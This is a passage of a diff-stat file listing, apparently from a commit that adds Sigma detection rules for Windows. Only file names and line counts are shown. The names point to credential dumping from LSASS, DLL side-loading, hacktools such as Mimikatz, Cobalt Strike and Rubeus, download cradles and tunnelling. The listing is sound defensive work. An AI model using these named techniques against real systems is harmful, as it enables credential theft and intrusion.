...rosoft_account_token_provider_dll_load.yml | 62 + ...msvcs_load_renamed_version_by_rundll32.yml | 37 + ..._load_dll_credui_uncommon_process_load.yml | 60 + ...age_load_dll_dbghelp_dbgcore_susp_load.yml | 64 + ...load_dll_dbghelp_dbgcore_unsigned_load.yml | 38 + .../image_load_dll_pcre_dotnet_dll_load.yml | 28 + ...mage_load_dll_rstrtmgr_suspicious_load.yml | 54 + .../image_load_dll_rstrtmgr_uncommon_load.yml | 61 + .../image_load_dll_sdiageng_load_by_msdt.yml | 29 + ...system_management_automation_susp_load.yml | 85 + .../image_load_dll_tttracer_module_load.yml | 34 + .../image_load_dll_vss_ps_susp_load.yml | 64 + .../image_load_dll_vssapi_susp_load.yml | 55 + .../image_load_dll_vsstrace_susp_load.yml | 47 + .../image_load_hktl_sharpevtmute.yml | 31 + .../image_load_hktl_silenttrinity_stager.yml | 30 + ...load_iexplore_dcom_iertutil_dll_hijack.yml | 34 + .../image_load_lsass_unsigned_image_load.yml | 28 + ...e_load_office_dotnet_assembly_dll_load.yml | 35 + .../image_load_office_dotnet_clr_dll_load.yml | 35 + .../image_load_office_dotnet_gac_dll_load.yml | 35 + .../image_load_office_dsparse_dll_load.yml | 35 + .../image_load_office_excel_xll_susp_load.yml | 39 + .../image_load_office_kerberos_dll_load.yml | 35 + ...image_load_office_outlook_outlvba_load.yml | 27 + .../image_load_office_powershell_dll_load.yml | 35 + .../image_load_office_vbadll_load.yml | 38 + .../image_load_rundll32_remote_share_load.yml | 28 + ...e_load_scrcons_wmi_scripteventconsumer.yml | 37 + .../image_load/image_load_side_load_7za.yml | 36 + ..._load_side_load_abused_dlls_susp_paths.yml | 52 + .../image_load_side_load_antivirus.yml | 89 + .../image_load_side_load_appverifui.yml | 36 + ...aruba_networks_virtual_intranet_access.yml | 50 + .../image_load_side_load_avkkid.yml | 36 + .../image_load_side_load_ccleaner_du.yml | 36 + ...ge_load_side_load_ccleaner_reactivator.yml | 34 + ...age_load_side_load_chrome_frame_helper.yml | 36 + ...image_load_side_load_classicexplorer32.yml | 32 + 
.../image_load_side_load_comctl32.yml | 37 + .../image_load_side_load_coregen.yml | 33 + ...side_load_cpl_from_non_system_location.yml | 34 + .../image_load_side_load_dbgcore_dll.yml | 41 + .../image_load_side_load_dbghelp_dll.yml | 47 + .../image_load_side_load_eacore.yml | 33 + .../image_load_side_load_edputil.yml | 33 + ...oad_side_load_from_non_system_location.yml | 487 ++ .../image_load_side_load_goopdate.yml | 42 + .../image_load_side_load_gup_libcurl.yml | 32 + .../image_load_side_load_iviewers.yml | 32 + .../image_load_side_load_jsschhlp.yml | 32 + .../image_load_side_load_libvlc.yml | 34 + .../image_load_side_load_mfdetours.yml | 30 + ...mage_load_side_load_mfdetours_unsigned.yml | 34 + ...image_load_side_load_non_existent_dlls.yml | 54 + .../image_load_side_load_office_dlls.yml | 36 + .../image_load/image_load_side_load_rcdll.yml | 33 + ...side_load_rjvplatform_default_location.yml | 29 + ..._load_rjvplatform_non_default_location.yml | 31 + .../image_load_side_load_robform.yml | 39 + .../image_load_side_load_shell_chrome_api.yml | 36 + .../image_load_side_load_shelldispatch.yml | 33 + .../image_load_side_load_smadhook.yml | 40 + .../image_load_side_load_solidpdfcreator.yml | 33 + .../image_load_side_load_third_party.yml | 48 + .../image_load_side_load_ualapi.yml | 32 + .../image_load_side_load_vivaldi_elf.yml | 31 + .../image_load_side_load_vmguestlib.yml | 34 + ...ge_load_side_load_vmmap_dbghelp_signed.yml | 36 + ..._load_side_load_vmmap_dbghelp_unsigned.yml | 38 + .../image_load_side_load_vmware_xfer.yml | 30 + .../image_load_side_load_waveedit.yml | 35 + .../image_load/image_load_side_load_wazuh.yml | 43 + .../image_load_side_load_windows_defender.yml | 40 + .../image_load/image_load_side_load_wwlib.yml | 38 + .../image_load_spoolsv_dll_load.yml | 36 + ..._susp_clickonce_unsigned_module_loaded.yml | 29 + ...mage_load_susp_dll_load_system_process.yml | 31 + .../image_load_susp_python_image_load.yml | 37 + ...e_load_susp_script_dotnet_clr_dll_load.yml | 
43 + .../image_load_susp_uncommon_image_load.yml | 30 + .../image_load_thor_unsigned_execution.yml | 35 + .../image_load_uac_bypass_iscsicpl.yml | 34 + .../image_load_uac_bypass_via_dism.yml | 33 + ...persistence_commandline_event_consumer.yml | 28 + ...ge_load_wmic_remote_xsl_scripting_dlls.yml | 34 + ...mage_load_wmiprvse_wbemcomn_dll_hijack.yml | 30 + .../image_load_wsman_provider_image_load.yml | 74 + .../net_connection_win_addinutil.yml | 27 + .../net_connection_win_binary_susp_com.yml | 67 + ...tion_win_certutil_initiated_connection.yml | 35 + ...net_connection_win_crypto_mining_pools.yml | 256 + ...net_connection_win_dead_drop_resolvers.yml | 212 + ...et_connection_win_devtunnel_connection.yml | 37 + ...et_connection_win_dfsvc_uncommon_ports.yml | 32 + ...connection_win_dllhost_net_connections.yml | 78 + .../net_connection_win_eqnedt.yml | 27 + ..._win_excel_outbound_network_connection.yml | 54 + ...tion_win_google_api_non_browser_access.yml | 83 + .../net_connection_win_hh.yml | 36 + .../net_connection_win_imewdbld.yml | 33 + .../net_connection_win_mega_nz.yml | 29 + .../net_connection_win_msiexec.yml | 30 + .../net_connection_win_ngrok_domains.yml | 36 + .../net_connection_win_ngrok_tunnel.yml | 40 + ...nection_win_notepad_network_connection.yml | 32 + ...tion_win_notion_api_susp_communication.yml | 68 + .../net_connection_win_office_susp_ports.yml | 43 + ...tion_win_powershell_network_connection.yml | 81 + .../net_connection_win_python.yml | 45 + ...n_rdp_outbound_over_non_standard_tools.yml | 78 + .../net_connection_win_rdp_reverse_tunnel.yml | 35 + .../net_connection_win_rdp_to_http.yml | 36 + ...tion_win_reddit_api_non_browser_access.yml | 70 + ...nnection_win_regsvr32_network_activity.yml | 31 + ..._win_remote_powershell_session_network.yml | 53 + ...onnection_win_rundll32_net_connections.yml | 59 + .../net_connection_win_script.yml | 29 + .../net_connection_win_script_wan.yml | 50 + ..._silenttrinity_stager_msbuild_activity.yml | 32 + 
..._connection_win_susp_binary_no_cmdline.yml | 37 + .../net_connection_win_susp_cmstp.yml | 27 + .../net_connection_win_susp_dropbox_api.yml | 32 + .../net_connection_win_susp_epmap.yml | 39 + ...connection_win_susp_external_ip_lookup.yml | 106 + ...nection_win_susp_malware_callback_port.yml | 110 + ...n_susp_malware_callback_ports_uncommon.yml | 59 + ..._win_susp_outbound_kerberos_connection.yml | 42 + ...n_win_susp_outbound_mobsync_connection.yml | 50 + ...ion_win_susp_outbound_smtp_connections.yml | 44 + ..._susp_prog_location_network_connection.yml | 38 + ...on_win_telegram_api_non_browser_access.yml | 67 + ...onnection_win_vscode_tunnel_connection.yml | 37 + ...onnection_win_winlogon_net_connections.yml | 50 + ...nection_win_wuauclt_network_connection.yml | 92 + ...dfs_namedpipe_connection_uncommon_tool.yml | 48 + .../pipe_created_hktl_cobaltstrike.yml | 62 + .../pipe_created_hktl_cobaltstrike_re.yml | 55 + ...d_hktl_cobaltstrike_susp_pipe_patterns.yml | 73 + .../pipe_created_hktl_coercedpotato.yml | 31 + .../pipe_created_hktl_diagtrack_eop.yml | 29 + .../pipe_created_hktl_efspotato.yml | 38 + ...ted_hktl_generic_cred_dump_tools_pipes.yml | 37 + .../pipe_created_hktl_koh_default_pipe.yml | 34 + ...created_powershell_alternate_host_pipe.yml | 59 + ...pipe_created_powershell_execution_pipe.yml | 34 + .../pipe_created_pua_csexec_default_pipe.yml | 36 + .../pipe_created_pua_paexec_default_pipe.yml | 30 + .../pipe_created_pua_remcom_default_pipe.yml | 36 + ...created_scrcons_wmi_consumer_namedpipe.yml | 30 + ...pipe_created_susp_malicious_namedpipes.yml | 70 + ...nals_psexec_default_pipe_susp_location.yml | 41 + ...on_win_userdomain_variable_enumeration.yml | 29 + ...c_access_win_cmstp_execution_by_access.yml | 33 + ...ktl_cobaltstrike_bof_injection_pattern.yml | 33 + .../proc_access_win_hktl_generic_access.yml | 115 + ...ccess_win_hktl_handlekatz_lsass_access.yml | 34 + ...n_hktl_littlecorporal_generated_maldoc.yml | 31 + .../proc_access_win_hktl_sysmonente.yml | 
43 + ...proc_access_win_lsass_dump_comsvcs_dll.yml | 30 + ...oc_access_win_lsass_dump_keyword_image.yml | 57 + .../proc_access_win_lsass_memdump.yml | 62 + ...roc_access_win_lsass_python_based_tool.yml | 42 + ...s_win_lsass_remote_access_trough_winrm.yml | 35 + .../proc_access_win_lsass_seclogon_access.yml | 31 + ...proc_access_win_lsass_susp_access_flag.yml | 130 + .../proc_access_win_lsass_werfault.yml | 31 + ...ss_win_lsass_whitelisted_process_names.yml | 62 + ...ess_win_susp_direct_ntopenprocess_call.yml | 78 + ...roc_access_win_susp_invoke_patchingapi.yml | 77 + ...oc_access_win_susp_shellcode_injection.yml | 72 + ..._access_win_svchost_credential_dumping.yml | 31 + ...access_win_svchost_susp_access_request.yml | 37 + ...in_uac_bypass_editionupgrademanagerobj.yml | 29 + ...roc_access_win_uac_bypass_wow64_logger.yml | 30 + ...proc_creation_win_7zip_exfil_dmp_files.yml | 43 + ...creation_win_7zip_password_compression.yml | 40 + ..._creation_win_7zip_password_extraction.yml | 38 + ...ation_win_addinutil_suspicious_cmdline.yml | 51 + ...n_win_addinutil_uncommon_child_process.yml | 32 + ...reation_win_addinutil_uncommon_cmdline.yml | 38 + ...eation_win_addinutil_uncommon_dir_exec.yml | 32 + .../proc_creation_win_adplus_memory_dump.yml | 43 + ...tion_win_agentexecutor_potential_abuse.yml | 45 + ..._creation_win_agentexecutor_susp_usage.yml | 49 + ...tion_win_appvlp_uncommon_child_process.yml | 48 + ...creation_win_aspnet_compiler_exectuion.yml | 38 + ...win_aspnet_compiler_susp_child_process.yml | 47 + ...reation_win_aspnet_compiler_susp_paths.yml | 46 + ..._creation_win_at_interactive_execution.yml | 29 + .../proc_creation_win_attrib_hiding_files.yml | 38 + .../proc_creation_win_attrib_system.yml | 35 + ..._creation_win_attrib_system_susp_paths.yml | 57 + ...ion_win_auditpol_nt_resource_kit_usage.yml | 39 + ...c_creation_win_auditpol_susp_execution.yml | 39 + ...oc_creation_win_bash_command_execution.yml | 32 + .../proc_creation_win_bash_file_execution.yml | 47 + 
..._creation_win_bcdedit_boot_conf_tamper.yml | 42 + ...oc_creation_win_bcdedit_susp_execution.yml | 36 + ...on_win_bginfo_suspicious_child_process.yml | 52 + ...tion_win_bginfo_uncommon_child_process.yml | 36 + .../proc_creation_win_bitsadmin_download.yml | 44 + ...ation_win_bitsadmin_download_direct_ip.yml | 58 + ...itsadmin_download_file_sharing_domains.yml | 69 + ...win_bitsadmin_download_susp_extensions.yml | 72 + ...n_bitsadmin_download_susp_targetfolder.yml | 51 + ...tsadmin_download_uncommon_targetfolder.yml | 49 + ...on_win_bitsadmin_potential_persistence.yml | 44 + ...n_browsers_chromium_headless_debugging.yml | 35 + ...on_win_browsers_chromium_headless_exec.yml | 36 + ...owsers_chromium_headless_file_download.yml | 40 + ...n_win_browsers_chromium_load_extension.yml | 38 + ...on_win_browsers_chromium_mockbin_abuse.yml | 36 + ..._browsers_chromium_susp_load_extension.yml | 47 + ...tion_win_browsers_inline_file_download.yml | 48 + ...creation_win_browsers_remote_debugging.yml | 37 + ...oc_creation_win_browsers_tor_execution.yml | 29 + .../proc_creation_win_calc_uncommon_exec.yml | 35 + ...n_win_certmgr_certificate_installation.yml | 40 + .../proc_creation_win_certoc_download.yml | 35 + ...creation_win_certoc_download_direct_ip.yml | 35 + .../proc_creation_win_certoc_load_dll.yml | 40 + ...ion_win_certoc_load_dll_susp_locations.yml | 44 + ..._win_certutil_certificate_installation.yml | 41 + .../proc_creation_win_certutil_decode.yml | 40 + .../proc_creation_win_certutil_download.yml | 40 + ...eation_win_certutil_download_direct_ip.yml | 77 + ...certutil_download_file_sharing_domains.yml | 67 + .../proc_creation_win_certutil_encode.yml | 34 + ...on_win_certutil_encode_susp_extensions.yml | 52 + ...tion_win_certutil_encode_susp_location.yml | 47 + .../proc_creation_win_certutil_export_pfx.yml | 32 + ...oc_creation_win_certutil_ntlm_coercion.yml | 32 + ...proc_creation_win_chcp_codepage_lookup.yml | 38 + ...proc_creation_win_chcp_codepage_switch.yml | 37 + 
...tion_win_cipher_overwrite_deleted_data.yml | 33 + ...ion_win_citrix_trolleyexpress_procdump.yml | 48 + .../proc_creation_win_clip_execution.yml | 29 + ...ion_win_cloudflared_portable_execution.yml | 35 + ..._win_cloudflared_quicktunnel_execution.yml | 93 + ...reation_win_cloudflared_tunnel_cleanup.yml | 35 + ...oc_creation_win_cloudflared_tunnel_run.yml | 38 + .../proc_creation_win_cmd_assoc_execution.yml | 43 + ..._cmd_assoc_tamper_exe_file_association.yml | 39 + ...c_creation_win_cmd_copy_dmp_from_share.yml | 36 + ...ation_win_cmd_curl_download_exec_combo.yml | 37 + .../proc_creation_win_cmd_del_execution.yml | 42 + ...c_creation_win_cmd_del_greedy_deletion.yml | 41 + .../proc_creation_win_cmd_dir_execution.yml | 30 + .../proc_creation_win_cmd_dosfuscation.yml | 46 + .../proc_creation_win_cmd_http_appdata.yml | 38 + .../proc_creation_win_cmd_mklink_osk_cmd.yml | 35 + ...md_mklink_shadow_copies_access_symlink.yml | 30 + ...reation_win_cmd_net_use_and_exec_combo.yml | 41 + ...oc_creation_win_cmd_no_space_execution.yml | 71 + ...oc_creation_win_cmd_ntdllpipe_redirect.yml | 30 + .../proc_creation_win_cmd_path_traversal.yml | 44 + ...n_win_cmd_ping_copy_combined_execution.yml | 36 + ...on_win_cmd_ping_del_combined_execution.yml | 46 + .../proc_creation_win_cmd_redirect.yml | 38 + ...eation_win_cmd_redirection_susp_folder.yml | 61 + .../proc_creation_win_cmd_rmdir_execution.yml | 39 + ...roc_creation_win_cmd_shadowcopy_access.yml | 33 + .../proc_creation_win_cmd_stdin_redirect.yml | 33 + ...cmd_sticky_key_like_backdoor_execution.yml | 50 + ...c_creation_win_cmd_sticky_keys_replace.yml | 34 + .../proc_creation_win_cmd_unusual_parent.yml | 52 + ...eation_win_cmdkey_adding_generic_creds.yml | 32 + .../proc_creation_win_cmdkey_recon.yml | 38 + ...eation_win_cmstp_execution_by_creation.yml | 35 + ...roc_creation_win_conhost_legacy_option.yml | 32 + ...oc_creation_win_conhost_path_traversal.yml | 27 + ...reation_win_conhost_susp_child_process.yml | 35 + 
...c_creation_win_conhost_uncommon_parent.yml | 59 + .../proc_creation_win_control_panel_item.yml | 47 + ...eation_win_createdump_lolbin_execution.yml | 40 + ...ation_win_csc_susp_dynamic_compilation.yml | 76 + .../proc_creation_win_csc_susp_parent.yml | 91 + .../proc_creation_win_csi_execution.yml | 44 + ...creation_win_csi_use_of_csharp_console.yml | 32 + .../proc_creation_win_csvde_export.yml | 32 + ...roc_creation_win_curl_cookie_hijacking.yml | 29 + ...oc_creation_win_curl_custom_user_agent.yml | 30 + ...ation_win_curl_download_direct_ip_exec.yml | 85 + ...url_download_direct_ip_susp_extensions.yml | 82 + ...url_download_susp_file_sharing_domains.yml | 93 + ..._creation_win_curl_insecure_connection.yml | 29 + ...reation_win_curl_insecure_porxy_or_doh.yml | 30 + ...proc_creation_win_curl_local_file_read.yml | 28 + .../proc_creation_win_curl_susp_download.yml | 71 + ...desktopimgdownldr_remote_file_download.yml | 28 + ...n_win_desktopimgdownldr_susp_execution.yml | 40 + ...ion_win_deviceenroller_dll_sideloading.yml | 36 + ...proc_creation_win_devinit_lolbin_usage.yml | 31 + ...n_win_dfsvc_suspicious_child_processes.yml | 45 + .../proc_creation_win_dirlister_execution.yml | 29 + ...tion_win_diskshadow_child_process_susp.yml | 51 + ...on_win_diskshadow_script_mode_susp_ext.yml | 52 + ...n_diskshadow_script_mode_susp_location.yml | 55 + ..._creation_win_dll_sideload_vmware_xfer.yml | 28 + ..._creation_win_dllhost_no_cli_execution.yml | 34 + ...n_win_dns_exfiltration_tools_execution.yml | 29 + ...oc_creation_win_dns_susp_child_process.yml | 29 + .../proc_creation_win_dnscmd_discovery.yml | 36 + ...md_install_new_server_level_plugin_dll.yml | 37 + ...tion_win_dotnet_trace_lolbin_execution.yml | 32 + .../proc_creation_win_driverquery_recon.yml | 43 + .../proc_creation_win_driverquery_usage.yml | 43 + ..._creation_win_dsacls_abuse_permissions.yml | 39 + ...roc_creation_win_dsacls_password_spray.yml | 34 + .../proc_creation_win_dsim_remove.yml | 44 + 
...ion_win_dsquery_domain_trust_discovery.yml | 36 + .../proc_creation_win_dtrace_kernel_dump.yml | 32 + ...oc_creation_win_dumpminitool_execution.yml | 43 + ...eation_win_dumpminitool_susp_execution.yml | 50 + .../proc_creation_win_esentutl_params.yml | 37 + ...ation_win_esentutl_sensitive_file_copy.yml | 50 + .../proc_creation_win_esentutl_webcache.yml | 36 + ...eation_win_eventvwr_susp_child_process.yml | 38 + ...ltration_and_tunneling_tools_execution.yml | 32 + ...proc_creation_win_expand_cabinet_files.yml | 54 + ...eation_win_explorer_break_process_tree.yml | 38 + ...creation_win_explorer_lolbin_execution.yml | 29 + .../proc_creation_win_explorer_nouaccheck.yml | 32 + .../proc_creation_win_findstr_download.yml | 48 + ...roc_creation_win_findstr_gpp_passwords.yml | 37 + .../proc_creation_win_findstr_lnk.yml | 39 + .../proc_creation_win_findstr_lsass.yml | 42 + ...oc_creation_win_findstr_recon_everyone.yml | 47 + ...creation_win_findstr_recon_pipe_output.yml | 74 + ...on_win_findstr_security_keyword_lookup.yml | 68 + ..._creation_win_findstr_subfolder_search.yml | 46 + ..._sysmon_discovery_via_default_altitude.yml | 34 + .../proc_creation_win_finger_usage.yml | 30 + .../proc_creation_win_fltmc_unload_driver.yml | 39 + ...reation_win_fltmc_unload_driver_sysmon.yml | 37 + ...in_forfiles_child_process_masquerading.yml | 44 + ...creation_win_forfiles_proxy_execution_.yml | 41 + ..._creation_win_fsutil_drive_enumeration.yml | 31 + ..._creation_win_fsutil_symlinkevaluation.yml | 36 + .../proc_creation_win_fsutil_usage.yml | 42 + ...ownloadwrapper_arbitrary_file_download.yml | 32 + .../proc_creation_win_git_susp_clone.yml | 51 + ...on_win_googleupdate_susp_child_process.yml | 38 + .../proc_creation_win_gpg4win_decryption.yml | 34 + .../proc_creation_win_gpg4win_encryption.yml | 34 + ...reation_win_gpg4win_portable_execution.yml | 37 + ...roc_creation_win_gpg4win_susp_location.yml | 41 + .../proc_creation_win_gpresult_execution.yml | 32 + 
...ion_win_gup_arbitrary_binary_execution.yml | 34 + .../proc_creation_win_gup_download.yml | 34 + ..._creation_win_gup_suspicious_execution.yml | 36 + .../proc_creation_win_hh_chm_execution.yml | 32 + ...in_hh_chm_remote_download_or_execution.yml | 32 + ...on_win_hh_html_help_susp_child_process.yml | 58 + .../proc_creation_win_hh_susp_execution.yml | 56 + .../proc_creation_win_hktl_adcspwn.yml | 29 + ...reation_win_hktl_bloodhound_sharphound.yml | 58 + ..._creation_win_hktl_c3_rundll32_pattern.yml | 30 + .../proc_creation_win_hktl_certify.yml | 45 + .../proc_creation_win_hktl_certipy.yml | 51 + ...ion_win_hktl_cobaltstrike_bloopers_cmd.yml | 49 + ...win_hktl_cobaltstrike_bloopers_modules.yml | 42 + ...win_hktl_cobaltstrike_load_by_rundll32.yml | 38 + ...win_hktl_cobaltstrike_process_patterns.yml | 44 + .../proc_creation_win_hktl_coercedpotato.yml | 39 + .../proc_creation_win_hktl_covenant.yml | 40 + ...eation_win_hktl_crackmapexec_execution.yml | 86 + ...n_hktl_crackmapexec_execution_patterns.yml | 41 + ...reation_win_hktl_crackmapexec_patterns.yml | 49 + ...tl_crackmapexec_powershell_obfuscation.yml | 48 + .../proc_creation_win_hktl_createminidump.yml | 29 + .../proc_creation_win_hktl_dinjector.yml | 29 + .../proc_creation_win_hktl_dumpert.yml | 29 + .../proc_creation_win_hktl_edrsilencer.yml | 29 + ...tion_win_hktl_empire_powershell_launch.yml | 36 + ..._win_hktl_empire_powershell_uac_bypass.yml | 35 + .../proc_creation_win_hktl_evil_winrm.yml | 32 + ...ation_win_hktl_execution_via_imphashes.yml | 203 + ...ion_win_hktl_execution_via_pe_metadata.yml | 29 + .../proc_creation_win_hktl_gmer.yml | 35 + .../proc_creation_win_hktl_handlekatz.yml | 44 + .../proc_creation_win_hktl_hashcat.yml | 33 + ...c_creation_win_hktl_htran_or_natbypass.yml | 35 + .../proc_creation_win_hktl_hydra.yml | 33 + ...ion_win_hktl_impacket_lateral_movement.yml | 76 + .../proc_creation_win_hktl_impacket_tools.yml | 78 + .../proc_creation_win_hktl_impersonate.yml | 44 + 
.../proc_creation_win_hktl_inveigh.yml | 38 + ...ation_win_hktl_invoke_obfuscation_clip.yml | 39 + ...obfuscation_obfuscated_iex_commandline.yml | 35 + ...tion_win_hktl_invoke_obfuscation_stdin.yml | 42 + ...eation_win_hktl_invoke_obfuscation_var.yml | 38 + ...n_hktl_invoke_obfuscation_via_compress.yml | 35 + ..._win_hktl_invoke_obfuscation_via_stdin.yml | 36 + ...n_hktl_invoke_obfuscation_via_use_clip.yml | 44 + ..._hktl_invoke_obfuscation_via_use_mhsta.yml | 35 + ...on_win_hktl_invoke_obfuscation_via_var.yml | 43 + ...eation_win_hktl_jlaive_batch_execution.yml | 45 + .../proc_creation_win_hktl_koadic.yml | 40 + .../proc_creation_win_hktl_krbrelay.yml | 43 + .../proc_creation_win_hktl_krbrelayup.yml | 45 + .../proc_creation_win_hktl_localpotato.yml | 40 + ...reation_win_hktl_meterpreter_getsystem.yml | 54 + ...reation_win_hktl_mimikatz_command_line.yml | 59 + .../proc_creation_win_hktl_pchunter.yml | 62 + ...tl_powersploit_empire_default_schtasks.yml | 47 + .../proc_creation_win_hktl_powertool.yml | 33 + ...eation_win_hktl_purplesharp_indicators.yml | 32 + .../proc_creation_win_hktl_pypykatz.yml | 33 + .../proc_creation_win_hktl_quarks_pwdump.yml | 38 + ...on_win_hktl_redmimicry_winnti_playbook.yml | 36 + ..._creation_win_hktl_relay_attacks_tools.yml | 62 + .../proc_creation_win_hktl_rubeus.yml | 53 + .../proc_creation_win_hktl_safetykatz.yml | 29 + .../proc_creation_win_hktl_secutyxploded.yml | 30 + .../proc_creation_win_hktl_selectmyparent.yml | 58 + .../proc_creation_win_hktl_sharp_chisel.yml | 33 + ..._creation_win_hktl_sharp_impersonation.yml | 44 + ...c_creation_win_hktl_sharp_ldap_monitor.yml | 32 + .../proc_creation_win_hktl_sharpersist.yml | 45 + .../proc_creation_win_hktl_sharpevtmute.yml | 34 + ...proc_creation_win_hktl_sharpldapwhoami.yml | 39 + .../proc_creation_win_hktl_sharpup.yml | 38 + .../proc_creation_win_hktl_sharpview.yml | 146 + ...creation_win_hktl_silenttrinity_stager.yml | 30 + ...n_win_hktl_sliver_c2_execution_pattern.yml | 28 + 
...ation_win_hktl_stracciatella_execution.yml | 37 + .../proc_creation_win_hktl_sysmoneop.yml | 35 + .../proc_creation_win_hktl_trufflesnout.yml | 30 + .../proc_creation_win_hktl_uacme.yml | 70 + .../proc_creation_win_hktl_wce.yml | 38 + .../proc_creation_win_hktl_winpeas.yml | 52 + .../proc_creation_win_hktl_winpwn.yml | 49 + ...on_win_hktl_wmiexec_default_powershell.yml | 26 + .../proc_creation_win_hktl_xordump.yml | 33 + .../proc_creation_win_hktl_zipexec.yml | 39 + .../proc_creation_win_hostname_execution.yml | 27 + .../proc_creation_win_hwp_exploits.yml | 36 + .../proc_creation_win_hxtsr_masquerading.yml | 32 + .../proc_creation_win_icacls_deny.yml | 32 + .../proc_creation_win_ieexec_download.yml | 32 + ...c_creation_win_iis_appcmd_http_logging.yml | 34 + ...appcmd_service_account_password_dumped.yml | 52 + ...ion_win_iis_appcmd_susp_module_install.yml | 38 + ...ation_win_iis_appcmd_susp_rewrite_rule.yml | 33 + ..._win_iis_connection_strings_decryption.yml | 32 + ...ation_win_iis_susp_module_registration.yml | 36 + ...ion_win_imagingdevices_unusual_parents.yml | 35 + .../proc_creation_win_imewbdld_download.yml | 37 + ..._infdefaultinstall_execute_sct_scripts.yml | 35 + ...proc_creation_win_installutil_download.yml | 34 + ...eation_win_instalutil_no_log_execution.yml | 31 + ...on_win_java_keytool_susp_child_process.yml | 54 + ...n_java_manageengine_susp_child_process.yml | 65 + ...roc_creation_win_java_remote_debugging.yml | 38 + ...c_creation_win_java_susp_child_process.yml | 55 + ...creation_win_java_susp_child_process_2.yml | 37 + ...n_java_sysaidserver_susp_child_process.yml | 29 + .../proc_creation_win_kd_execution.yml | 27 + ...on_win_ksetup_password_change_computer.yml | 29 + ...eation_win_ksetup_password_change_user.yml | 28 + .../proc_creation_win_ldifde_export.yml | 32 + .../proc_creation_win_ldifde_file_load.yml | 37 + ...n_lodctr_performance_counter_tampering.yml | 30 + ...c_creation_win_logman_disable_eventlog.yml | 41 + 
.../proc_creation_win_lolbin_cdb.yml | 37 + ...creation_win_lolbin_class_exec_xwizard.yml | 28 + .../proc_creation_win_lolbin_cmdl32.yml | 35 + ...eation_win_lolbin_configsecuritypolicy.yml | 34 + ...oc_creation_win_lolbin_customshellhost.yml | 29 + ...data_exfiltration_by_using_datasvcutil.yml | 44 + ...eation_win_lolbin_dctask64_proc_inject.yml | 35 + .../proc_creation_win_lolbin_defaultpack.yml | 28 + ...in_lolbin_device_credential_deployment.yml | 26 + ...c_creation_win_lolbin_devtoolslauncher.yml | 29 + .../proc_creation_win_lolbin_diantz_ads.yml | 30 + ..._creation_win_lolbin_diantz_remote_cab.yml | 30 + ...eation_win_lolbin_dll_sideload_xwizard.yml | 30 + .../proc_creation_win_lolbin_dnx.yml | 29 + .../proc_creation_win_lolbin_dotnet.yml | 39 + .../proc_creation_win_lolbin_dotnet_dump.yml | 30 + .../proc_creation_win_lolbin_dump64.yml | 33 + .../proc_creation_win_lolbin_extexport.yml | 29 + .../proc_creation_win_lolbin_extrac32.yml | 36 + .../proc_creation_win_lolbin_extrac32_ads.yml | 30 + .../proc_creation_win_lolbin_format.yml | 34 + ...reation_win_lolbin_fsharp_interpreters.yml | 32 + .../proc_creation_win_lolbin_ftp.yml | 36 + ...reation_win_lolbin_gather_network_info.yml | 42 + .../proc_creation_win_lolbin_gpscript.yml | 35 + .../proc_creation_win_lolbin_ie4uinit.yml | 35 + .../proc_creation_win_lolbin_ilasm.yml | 29 + .../proc_creation_win_lolbin_jsc.yml | 27 + .../proc_creation_win_lolbin_kavremover.yml | 30 + ..._creation_win_lolbin_launch_vsdevshell.yml | 30 + .../proc_creation_win_lolbin_manage_bde.yml | 41 + ...win_lolbin_mavinject_process_injection.yml | 41 + .../proc_creation_win_lolbin_mpiexec.yml | 35 + .../proc_creation_win_lolbin_msdeploy.yml | 38 + ...c_creation_win_lolbin_msdt_answer_file.yml | 34 + .../proc_creation_win_lolbin_openconsole.yml | 29 + .../proc_creation_win_lolbin_openwith.yml | 29 + .../proc_creation_win_lolbin_pcalua.yml | 32 + .../proc_creation_win_lolbin_pcwrun.yml | 35 + ...roc_creation_win_lolbin_pcwrun_follina.yml | 
28 + .../proc_creation_win_lolbin_pcwutl.yml | 33 + .../proc_creation_win_lolbin_pester.yml | 39 + .../proc_creation_win_lolbin_pester_1.yml | 44 + .../proc_creation_win_lolbin_printbrm.yml | 31 + .../proc_creation_win_lolbin_pubprn.yml | 28 + ...tion_win_lolbin_rasautou_dll_execution.yml | 34 + .../proc_creation_win_lolbin_register_app.yml | 28 + .../proc_creation_win_lolbin_remote.yml | 28 + .../proc_creation_win_lolbin_replace.yml | 32 + .../proc_creation_win_lolbin_runexehelper.yml | 27 + ...oc_creation_win_lolbin_runscripthelper.yml | 32 + .../proc_creation_win_lolbin_scriptrunner.yml | 30 + .../proc_creation_win_lolbin_setres.yml | 31 + ...oc_creation_win_lolbin_settingsynchost.yml | 38 + .../proc_creation_win_lolbin_sftp.yml | 33 + ...eation_win_lolbin_sideload_link_binary.yml | 33 + .../proc_creation_win_lolbin_sigverif.yml | 27 + .../proc_creation_win_lolbin_ssh.yml | 39 + ...eation_win_lolbin_susp_acccheckconsole.yml | 32 + ...proc_creation_win_lolbin_susp_atbroker.yml | 58 + ...ation_win_lolbin_susp_certreq_download.yml | 37 + ...olbin_susp_driver_installed_by_pnputil.yml | 41 + .../proc_creation_win_lolbin_susp_dxcap.yml | 31 + .../proc_creation_win_lolbin_susp_grpconv.yml | 28 + ...ion_win_lolbin_susp_sqldumper_activity.yml | 32 + ...n_syncappvpublishingserver_execute_psh.yml | 39 + ...ncappvpublishingserver_vbs_execute_psh.yml | 36 + .../proc_creation_win_lolbin_tracker.yml | 42 + .../proc_creation_win_lolbin_ttdinject.yml | 27 + ..._creation_win_lolbin_tttracer_mod_load.yml | 34 + .../proc_creation_win_lolbin_type.yml | 33 + .../proc_creation_win_lolbin_unregmp2.yml | 29 + ...c_creation_win_lolbin_utilityfunctions.yml | 28 + ...ation_win_lolbin_visual_basic_compiler.yml | 28 + ...ation_win_lolbin_visualuiaverifynative.yml | 30 + ...c_creation_win_lolbin_vsiisexelauncher.yml | 31 + .../proc_creation_win_lolbin_wfc.yml | 28 + .../proc_creation_win_lolbin_wlrmdr.yml | 43 + ..._creation_win_lolbin_workflow_compiler.yml | 35 + 
